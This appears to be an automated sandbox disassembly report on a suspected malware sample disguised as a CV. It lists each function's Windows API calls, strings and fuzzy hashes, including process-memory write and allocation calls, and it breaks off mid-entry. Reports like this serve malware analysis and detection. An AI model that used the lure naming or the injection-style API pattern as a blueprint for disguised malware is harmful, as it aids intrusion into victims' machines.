Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 8a3c87dd11baff899aeacb43567a86748f9e55558f0973ca0ac29cce595785a6
Instruction ID: dbd016610a57b0ded62d75c0d13e21f272b33861758f080123a01ff9fa3ef7f7
Opcode Fuzzy Hash: 8a3c87dd11baff899aeacb43567a86748f9e55558f0973ca0ac29cce595785a6
Instruction Fuzzy Hash: 07F0C431001248EFDB379F69EC2D7A57B79EB1036AF888315E929951F0C73189A6DF50

Function 0033F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0033F2DA
CoCreateInstance.OLE32(0037DA7C,00000000,00000001,0037D8EC,?), ref: 0033F2F2
CoUninitialize.OLE32 ref: 0033F555

Strings

.lnk, xrefs: 0033F28B, 0033F290, 0033F29E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: bdbbcccfb719b8b402e01d362e659c1b55ff294889cc893e91925e4f6cbf31c2
Instruction ID: 34d0e4e602cb85e83b41c0d1c46adb187a0acfa18f918b8114ef3460c6bfb15b
Opcode Fuzzy Hash: bdbbcccfb719b8b402e01d362e659c1b55ff294889cc893e91925e4f6cbf31c2
Instruction Fuzzy Hash: F0A15C71114205AFD301EF64C895EAFB7ECEF98314F00492DF2559B2A2EB70EA49CB52

Function 0033E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 002F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002F53B1,?,?,002F61FF,?,00000000,00000001,00000000), ref: 002F662F

CoInitialize.OLE32(00000000), ref: 0033E85D
CoCreateInstance.OLE32(0037DA7C,00000000,00000001,0037D8EC,?), ref: 0033E876
CoUninitialize.OLE32 ref: 0033E893

Part of subcall function 002F936C: __swprintf.LIBCMT ref: 002F93AB
Part of subcall function 002F936C: __itow.LIBCMT ref: 002F93DF

Strings

.lnk, xrefs: 0033E83B, 0033E84D

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 102b318cc5c76d6b6febf749f6f1f8385e947fed3c3c9ac5f4e52a58d995cb6d
Instruction ID: b02f44d5aa611bacad6198f662e4bc91ef003c3e7f243db639f56b761496af81
Opcode Fuzzy Hash: 102b318cc5c76d6b6febf749f6f1f8385e947fed3c3c9ac5f4e52a58d995cb6d
Instruction Fuzzy Hash: D6A154356043059FCB11DF14C884E6ABBE5BF88720F158998F99A9B3A1CB31EC45CF81

Function 0031325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 003132ED

Part of subcall function 0031E0D0: __87except.LIBCMT ref: 0031E10B

Strings

pow, xrefs: 003132C5, 003132E2

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: dfc550664b7ac293968bba671dff5ac5b54cd72bcad22fb885e2593dbbb495cf
Instruction ID: f7d19fb64a56bc2007b74ff52d32702b9d36c810ebbce3153ab2843d3d211bb9
Opcode Fuzzy Hash: dfc550664b7ac293968bba671dff5ac5b54cd72bcad22fb885e2593dbbb495cf
Instruction Fuzzy Hash: 72515731A0820196CB1FB714CD113FA2B9CAB4C710F258D68F8E5862A9DF368ED59746

Function 00334606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0038DC50,?,0000000F,0000000C,00000016,0038DC50,?), ref: 00334645

Part of subcall function 002F936C: __swprintf.LIBCMT ref: 002F93AB
Part of subcall function 002F936C: __itow.LIBCMT ref: 002F93DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 003346C5

Strings

THIS, xrefs: 00334703
REMOVE, xrefs: 00334676

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: 69958b696f5f738c4532c2de34c4b979707617b1ceed020c6276e2ba245f0c2a
Instruction ID: 044b5b5610c3e7bc217754ba532f7e189aa72d82a4ddbb54bb569eb5f5b0240e
Opcode Fuzzy Hash: 69958b696f5f738c4532c2de34c4b979707617b1ceed020c6276e2ba245f0c2a
Instruction Fuzzy Hash: 60416F34A002199FCF02EF64C885ABDB7B5FF49344F148469E916AB2A2DB34ED55CF50

Function 0032C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0033430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0032BC08,?,?,00000034,00000800,?,00000034), ref: 00334335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0032C1D3

Part of subcall function 003342D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0032BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00334300

Part of subcall function 0033422F: GetWindowThreadProcessId.USER32(?,?), ref: 0033425A
Part of subcall function 0033422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0032BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0033426A
Part of subcall function 0033422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0032BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00334280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0032C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0032C28D

Strings

@, xrefs: 0032C2A5

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: d4cb08d077043d5aa6ea385963d04103e7fbda763439fe04124a531f1a3bca07
Instruction ID: f2782cce424580d63c87355c00a4d4b8fe355144494ddfd5d895dd3057080e68
Opcode Fuzzy Hash: d4cb08d077043d5aa6ea385963d04103e7fbda763439fe04124a531f1a3bca07
Instruction Fuzzy Hash: FF414C7690021CAFDB12EFA4CC81AEEB778AF09710F104495FA55BB181DA716E45CB61

Function 0035A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0038DC00,00000000,?,?,?,?), ref: 0035A6D8
GetWindowLongW.USER32 ref: 0035A6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0035A705

Strings

SysTreeView32, xrefs: 0035A6AA

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: ab45ec1e32b5c653daae37cce6403c9199d45785a8f77abf6b5c0916bde67965
Instruction ID: 061f81d78e299dd8a292e6f8c11810a34bd0bba80e30f3edaed5ff77c3f69e90
Opcode Fuzzy Hash: ab45ec1e32b5c653daae37cce6403c9199d45785a8f77abf6b5c0916bde67965
Instruction Fuzzy Hash: 1631BE3120160AAFDB228E78CC41FEA77A9FF49324F254725F975931E0C770E854AB90

Function 00345180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00345190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003451C6

Strings

D4, xrefs: 0034522E
|, xrefs: 003451B5

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$D4
API String ID: 1413715105-3173728052
Opcode ID: ab9c7b870ff206acab1963f2845bcbaee37fcdc74577c47e6efd8b7208476356
Instruction ID: c6bd13b6e513bbb656971f19338e0b2f0a8f3fc9c6da149f6d628ebf3d75b023
Opcode Fuzzy Hash: ab9c7b870ff206acab1963f2845bcbaee37fcdc74577c47e6efd8b7208476356
Instruction Fuzzy Hash: 00313A71C1011DABCF01AFA4CD45AEEBFB9FF18740F100125F915AA166DA716A55CFA0

Function 0035A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0035A15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0035A172
SendMessageW.USER32(?,00001002,00000000,?), ref: 0035A196

Strings

SysMonthCal32, xrefs: 0035A129

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: f227bb9b09b9a8d1ba4b0ea4fbce56e5c57d92cf76b1d416b5987af1651faea1
Instruction ID: d57ceacb089e07681f5adf22b98eb7d907a9f5b62a3326ebb7708e05f48e4be2
Opcode Fuzzy Hash: f227bb9b09b9a8d1ba4b0ea4fbce56e5c57d92cf76b1d416b5987af1651faea1
Instruction Fuzzy Hash: B321D132500618ABDF268F94CC82FEA3B79FF48714F110214FE55AB1E0D6B5AC54DBA0

Function 0035A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0035A941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0035A94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0035A956

Strings

msctls_updown32, xrefs: 0035A8BB

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 5d617097c6c6214a911569508b7eea47f2ef91fb95f0fc600e47715805925a65
Instruction ID: 892693be8d4502389d38f42d83f978068b7f3db138fa01b96fc5826e493b5b8f
Opcode Fuzzy Hash: 5d617097c6c6214a911569508b7eea47f2ef91fb95f0fc600e47715805925a65
Instruction Fuzzy Hash: 6221B0B5600609AFDB12DF18CC91DB737ADEF4E3A8F450259FA049B261CB30EC159B61

Function 003599A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00359A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00359A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00359A65

Strings

Listbox, xrefs: 003599FD

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 8aa77349aa5ac9b421e14f070a8dd6663ae0f25d1bb78025e2f2e8ad619acfe2
Instruction ID: 9a380a12bb090f0758ad70175692e8f9d3d2c5684e07b23569471f678c0175ca
Opcode Fuzzy Hash: 8aa77349aa5ac9b421e14f070a8dd6663ae0f25d1bb78025e2f2e8ad619acfe2
Instruction Fuzzy Hash: 4F21AF32610218AFDB268F54CC85FBB3BAEEF89761F028129F9449B1A0C6719C5587A0

Function 0035A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0035A46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0035A482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0035A48F

Strings

msctls_trackbar32, xrefs: 0035A444

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: fdb09cf989d1bbe015d92624fdc30928571bbd15ab73f9bdd7d76d8a5ba6fa76
Instruction ID: 17083c9c413a93783c019de0504cc1abd6e860bf90e6458d1769d10595e83393
Opcode Fuzzy Hash: fdb09cf989d1bbe015d92624fdc30928571bbd15ab73f9bdd7d76d8a5ba6fa76
Instruction Fuzzy Hash: 7211E7B1200208BEEF265FA5CC46FAB37ADEF89754F024218FE45A61A1D7B1E815D720

Function 00312287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00312350,?), ref: 003122A1
GetProcAddress.KERNEL32(00000000), ref: 003122A8

Strings

RoInitialize, xrefs: 00312290
combase.dll, xrefs: 0031229C

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 36b4339a8a3dee8961c305b87e2593d61b3db6e1f64fd59385aa80727ef671d0
Instruction ID: 16e1735df32d0868b30728231c1559ba54dc8888fb5bfc7479fbbaad12ac248a
Opcode Fuzzy Hash: 36b4339a8a3dee8961c305b87e2593d61b3db6e1f64fd59385aa80727ef671d0
Instruction Fuzzy Hash: 7BE01A74A90300ABDBAB5F74EC4AB5A366CBB0570AF004520F206E50A0CBB94191DF04

Function 0031235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00312276), ref: 00312376
GetProcAddress.KERNEL32(00000000), ref: 0031237D

Strings

RoUninitialize, xrefs: 00312365
combase.dll, xrefs: 00312371

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: 2b0a12fa1dcdd9f4ec7ff25b16b569f1e251754eaa62d0c8e96c6b74e6b7a8de
Instruction ID: 6f049a99016c1a06b657ee3fd221e69b1dcf36e612580c9bf3147dafbf809a73
Opcode Fuzzy Hash: 2b0a12fa1dcdd9f4ec7ff25b16b569f1e251754eaa62d0c8e96c6b74e6b7a8de
Instruction Fuzzy Hash: C1E0B678544300ABDB7F9F65ED0DB4A3A7CBB44706F114924F20EE20B0CBB89490DE14

Function 0036AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0036AC60
__swprintf.LIBCMT ref: 0036AC94

Strings

WIN_XPe, xrefs: 0036ACD3
%.3d, xrefs: 0036AC6E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: b3fce71c89a8d970dde93698675bcc2509139aa6778aa8ba9b7b84af7c1e49e9
Instruction ID: b85850a1cfcb2ead8b5b804ec1995a3ba36e198c78d0c1ca5357002d2b2f5e00
Opcode Fuzzy Hash: b3fce71c89a8d970dde93698675bcc2509139aa6778aa8ba9b7b84af7c1e49e9
Instruction Fuzzy Hash: D7E01271804E18DBCB139790CD45DF9B3BCAB08741F144492F906F1948E7359BC4EE12

Function 00352205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,003521FB,?,003523EF), ref: 00352213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00352225

Strings

GetProcessId, xrefs: 0035221F
kernel32.dll, xrefs: 0035220E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 669d5ba75b354334c1d5697b9f737a583a00afcccefba1fb1d7950d2ff4d1ea5
Instruction ID: 492af2d03f58d277dd46ce9a8a6e2882f658732d2080a1dfaaf82113bca91270
Opcode Fuzzy Hash: 669d5ba75b354334c1d5697b9f737a583a00afcccefba1fb1d7950d2ff4d1ea5
Instruction Fuzzy Hash: DDD05E388007169FC7635B24A808A4276E8EF06311F114819EC46A2160D6B0D8C48650

Function 002F42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,002F42EC,?,002F42AA,?), ref: 002F4304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 002F4316

Strings

Wow64RevertWow64FsRedirection, xrefs: 002F4310
kernel32.dll, xrefs: 002F42FF

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 167f56260661df3493ceb24c42ad956f436fafaedb73116a71eff8fec1c3ad94
Instruction ID: aa45368f05f1407c5d6f581d3478b30dfcfe1935f4d4bbde7a03a92d5f6b20df
Opcode Fuzzy Hash: 167f56260661df3493ceb24c42ad956f436fafaedb73116a71eff8fec1c3ad94
Instruction Fuzzy Hash: 69D05E308147139ED7665F64A808653B6E8EF05311F104469E946D2160E7B0C8C08710

Function 002F434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,002F41BB,002F4341,?,002F422F,?,002F41BB,?,?,?,?,002F39FE,?,00000001), ref: 002F4359
